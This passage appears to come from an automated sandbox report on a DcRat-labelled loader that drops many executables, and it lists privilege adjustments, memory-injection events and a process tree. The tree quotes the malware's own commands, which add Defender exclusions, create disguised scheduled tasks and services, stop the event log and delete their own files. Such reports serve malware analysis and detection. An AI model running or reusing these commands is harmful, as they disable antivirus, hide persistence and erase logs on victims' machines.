Token: SeSecurityPrivilege 1292 powershell.exe Token: SeTakeOwnershipPrivilege 1292 powershell.exe Token: SeLoadDriverPrivilege 1292 powershell.exe Token: SeSystemProfilePrivilege 1292 powershell.exe Token: SeSystemtimePrivilege 1292 powershell.exe Token: SeProfSingleProcessPrivilege 1292 powershell.exe Token: SeIncBasePriorityPrivilege 1292 powershell.exe Token: SeCreatePagefilePrivilege 1292 powershell.exe Token: SeBackupPrivilege 1292 powershell.exe Token: SeRestorePrivilege 1292 powershell.exe Token: SeShutdownPrivilege 1292 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeSystemEnvironmentPrivilege 1292 powershell.exe Token: SeRemoteShutdownPrivilege 1292 powershell.exe Token: SeUndockPrivilege 1292 powershell.exe Token: SeManageVolumePrivilege 1292 powershell.exe Token: 33 1292 powershell.exe Token: 34 1292 powershell.exe Token: 35 1292 powershell.exe Token: 36 1292 powershell.exe Token: SeDebugPrivilege 2496 svchost.exe Token: SeDebugPrivilege 5064 RegSvcs.exe Token: SeDebugPrivilege 512 powershell.exe Token: SeIncreaseQuotaPrivilege 512 powershell.exe Token: SeSecurityPrivilege 512 powershell.exe Token: SeTakeOwnershipPrivilege 512 powershell.exe Token: SeLoadDriverPrivilege 512 powershell.exe Token: SeSystemProfilePrivilege 512 powershell.exe Token: SeSystemtimePrivilege 512 powershell.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 3876 wininit.exe 3876 wininit.exe 872 medcallaboratory5.exe 872 medcallaboratory5.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 3876 wininit.exe 3876 wininit.exe 872 medcallaboratory5.exe 872 medcallaboratory5.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4256 BroomSetup.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe 4544 u3x4.1.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2496 svchost.exe 4228 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2648 wrote to memory of 4888 2648 New Text Document.exe 75 PID 2648 wrote to memory of 4888 2648 New Text Document.exe 75 PID 2648 wrote to memory of 4888 2648 New Text Document.exe 75 PID 2648 wrote to memory of 4280 2648 New Text Document.exe 76 PID 2648 wrote to memory of 4280 2648 New Text Document.exe 76 PID 2648 wrote to memory of 4280 2648 New Text Document.exe 76 PID 4280 wrote to memory of 1688 4280 xIPJVPDq.exe 121 PID 4280 wrote to memory of 1688 4280 xIPJVPDq.exe 121 PID 2648 wrote to memory of 3440 2648 New Text Document.exe 78 PID 2648 wrote to memory of 3440 2648 New Text Document.exe 78 PID 2648 wrote to memory of 3440 2648 New Text Document.exe 78 PID 2648 wrote to memory of 4828 2648 New Text Document.exe 80 PID 2648 wrote to memory of 4828 2648 New Text Document.exe 80 PID 2648 wrote to memory of 3876 2648 New Text Document.exe 82 PID 2648 wrote to memory of 3876 2648 New Text Document.exe 82 PID 2648 wrote to memory of 3876 2648 New Text Document.exe 82 PID 2648 wrote to memory of 4496 2648 New Text Document.exe 83 PID 2648 wrote to memory of 4496 2648 New Text Document.exe 83 PID 2648 wrote to memory of 4496 2648 New Text Document.exe 83 PID 2648 wrote to memory of 4612 2648 New Text Document.exe 84 PID 2648 wrote to memory of 4612 2648 New Text Document.exe 84 PID 2648 wrote to memory of 4612 2648 New Text Document.exe 84 PID 2648 wrote to memory of 1428 2648 New Text Document.exe 85 PID 2648 wrote to memory of 1428 2648 New Text Document.exe 85 PID 2648 wrote to memory of 1420 2648 New Text Document.exe 86 PID 2648 wrote to memory of 1420 2648 New Text Document.exe 86 PID 2648 wrote to memory of 1908 2648 New Text Document.exe 87 PID 2648 wrote to memory of 1908 2648 New Text Document.exe 87 PID 2648 wrote to memory of 1908 2648 New Text Document.exe 87 PID 2648 wrote to memory of 4324 2648 New Text Document.exe 88 PID 2648 wrote to memory of 4324 2648 New Text Document.exe 88 PID 2648 wrote to memory of 2496 2648 New Text Document.exe 89 PID 2648 wrote to memory of 2496 2648 New Text Document.exe 89 PID 4612 wrote to memory of 3020 4612 ISetup8.exe 90 PID 4612 wrote to memory of 3020 4612 ISetup8.exe 90 PID 4612 wrote to memory of 3020 4612 ISetup8.exe 90 PID 4324 wrote to memory of 752 4324 Tester.exe 95 PID 4324 wrote to memory of 752 4324 Tester.exe 95 PID 2648 wrote to memory of 2544 2648 New Text Document.exe 97 PID 2648 wrote to memory of 2544 2648 New Text Document.exe 97 PID 4324 wrote to memory of 1292 4324 Tester.exe 99 PID 4324 wrote to memory of 1292 4324 Tester.exe 99 PID 2648 wrote to memory of 4816 2648 New Text Document.exe 101 PID 2648 wrote to memory of 4816 2648 New Text Document.exe 101 PID 2648 wrote to memory of 4816 2648 New Text Document.exe 101 PID 2648 wrote to memory of 2728 2648 New Text Document.exe 102 PID 2648 wrote to memory of 2728 2648 New Text Document.exe 102 PID 2496 wrote to memory of 288 2496 svchost.exe 103 PID 2496 wrote to memory of 288 2496 svchost.exe 103 PID 2648 wrote to memory of 872 2648 New Text Document.exe 105 PID 2648 wrote to memory of 872 2648 New Text Document.exe 105 PID 2648 wrote to memory of 872 2648 New Text Document.exe 105 PID 872 wrote to memory of 5064 872 medcallaboratory5.exe 106 PID 872 wrote to memory of 5064 872 medcallaboratory5.exe 106 PID 872 wrote to memory of 5064 872 medcallaboratory5.exe 106 PID 872 wrote to memory of 5064 872 medcallaboratory5.exe 106 PID 2648 wrote to memory of 1072 2648 New Text Document.exe 107 PID 2648 wrote to memory of 1072 2648 New Text Document.exe 107 PID 2648 wrote to memory of 1072 2648 New Text Document.exe 107 PID 2728 wrote to memory of 512 2728 BrawlB0t.exe 108 PID 2728 wrote to memory of 512 2728 BrawlB0t.exe 108 PID 2728 wrote to memory of 1416 2728 BrawlB0t.exe 110 PID 2728 wrote to memory of 1416 2728 BrawlB0t.exe 110 PID 2728 wrote to memory of 4116 2728 BrawlB0t.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"1⤵
- DcRat
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\cBFZyhpY.exe"C:\Users\Admin\AppData\Local\Temp\cBFZyhpY.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"2⤵
- Executes dropped EXE
PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3876
-
-
C:\Users\Admin\AppData\Local\Temp\a\1234.exe"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"2⤵
- Executes dropped EXE
PID:4496
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Admin\AppData\Local\Temp\u3k4.0.exe"C:\Users\Admin\AppData\Local\Temp\u3k4.0.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KKKKEHJKFC.exe"4⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\KKKKEHJKFC.exe"C:\Users\Admin\AppData\Local\Temp\KKKKEHJKFC.exe"5⤵
- Executes dropped EXE
PID:4596 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KKKKEHJKFC.exe6⤵PID:4396
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30007⤵
- Runs ping.exe
PID:4636
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\test2.exe"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"2⤵
- Executes dropped EXE
PID:1428
-
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"2⤵
- Executes dropped EXE
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"3⤵
- DcRat
- Creates scheduled task(s)
PID:288
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"3⤵PID:3220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9FD5.tmp.bat""3⤵PID:6028
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:6040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\555.exe"C:\Users\Admin\AppData\Local\Temp\a\555.exe"2⤵
- Executes dropped EXE
PID:2544
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵PID:4676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"3⤵PID:1616
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3008
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA0D.tmp"3⤵
- DcRat
- Creates scheduled task(s)
PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Executes dropped EXE
PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Executes dropped EXE
PID:5460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit4⤵PID:5804
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'5⤵
- DcRat
- Creates scheduled task(s)
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp29F9.tmp.bat""4⤵PID:5488
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:64
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵PID:5604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"6⤵PID:4596
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB205.tmp"6⤵
- DcRat
- Creates scheduled task(s)
PID:5944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5680
-
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
PID:5236
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
PID:5456
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- DcRat
- Creates scheduled task(s)
PID:3772
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
-
C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"2⤵
- Executes dropped EXE
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
PID:1688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 7803⤵
- Program crash
PID:3724
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"2⤵
- Executes dropped EXE
PID:4280
-
-
C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD13⤵PID:5616
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:196 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4520
-
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"4⤵
- Executes dropped EXE
PID:1184
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"4⤵
- Executes dropped EXE
PID:1192
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:5928
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:5816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"2⤵
- Executes dropped EXE
PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"2⤵
- Executes dropped EXE
PID:4004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe3⤵PID:2256
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30004⤵
- Runs ping.exe
PID:5140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
PID:5164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 1323⤵
- Program crash
PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\new1.exe"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"2⤵
- Executes dropped EXE
PID:5356
-
-
C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5536 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5852
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"2⤵
- Executes dropped EXE
PID:5752 -
C:\Users\Admin\AppData\Local\Temp\u4fs.0.exe"C:\Users\Admin\AppData\Local\Temp\u4fs.0.exe"3⤵
- Executes dropped EXE
PID:6052
-
-
C:\Users\Admin\AppData\Local\Temp\u4fs.1.exe"C:\Users\Admin\AppData\Local\Temp\u4fs.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3772
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6024 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"3⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4004
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6088
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 7843⤵
- Program crash
PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\june.exe"C:\Users\Admin\AppData\Local\Temp\a\june.exe"2⤵
- Executes dropped EXE
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\is-7TLQJ.tmp\june.tmp"C:\Users\Admin\AppData\Local\Temp\is-7TLQJ.tmp\june.tmp" /SL5="$90232,4043444,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5872 -
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i4⤵
- Executes dropped EXE
PID:4596
-
-
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s4⤵
- Executes dropped EXE
PID:5824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5440 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 7843⤵
- Program crash
PID:6024
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\new.exe"C:\Users\Admin\AppData\Local\Temp\a\new.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5504
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5680
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5560
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5624
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:5756
-
-
C:\Users\Admin\AppData\Local\Temp\a\123p.exe"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"2⤵
- Executes dropped EXE
PID:5260 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:2572
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:5368
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:5920
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:4864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
PID:2844
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
PID:5564
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"2⤵
- Executes dropped EXE
- Modifies registry class
PID:5892 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"3⤵PID:5976
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "4⤵PID:5816
-
C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"5⤵
- Executes dropped EXE
